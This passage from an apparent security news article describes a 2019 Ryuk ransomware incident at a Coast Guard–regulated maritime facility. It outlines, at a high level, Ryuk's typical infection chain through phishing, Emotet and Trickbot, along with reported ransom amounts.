On December 16, 2019, the U.S. Coast Guard disclosed a security incident at a facility regulated by the Maritime Transportation Security Act (MTSA). Forensic analysis suggests that the incident might have begun when an employee clicked on a link embedded in a phishing email.

This action enabled a threat actor to set Ryuk ransomware loose on the facility’s network. Ultimately, the infection spread to all IT network files, leading Ryuk to disrupt the corporate IT network and prevent critical process control monitoring systems from functioning properly.

Phishing is one of the primary infection vectors for most ransomware families, but there’s an interesting twist with this particular family. As noted by Malwarebytes, a typical Ryuk attack begins when a user opens a weaponized Microsoft Office document attached to a phishing email. Opening the document causes a malicious macro to execute a PowerShell command that attempts to download the banking trojan Emotet. This has the ability to download additional malware onto an infected machine that retrieves and executes Trickbot.

This secondary payload, in turn, collects admin credentials, allowing digital attackers to move laterally to critical assets connected to the network. The attack chain concludes when the attackers execute Ryuk on each of these assets.

It’s never good for ransomware victims to not have a data backup that they can use to recover their data. In the case of Ryuk, it’s especially bad. McAfee reported in February 2019 that the typical Ryuk ransom demands amounted to $145,000—more than 10 times the average ransomware amount. Ryuk’s handlers were sometimes willing to negotiate; even then, the average ransom amount post-negotiation was still as high as $71,000.

Recent Attacks Involving Ryuk Ransomware

The security community documented numerous Ryuk attacks in 2019. Even so, the ransomware had a particularly busy final quarter. Here are just some of the infections that made headlines during this three-month period.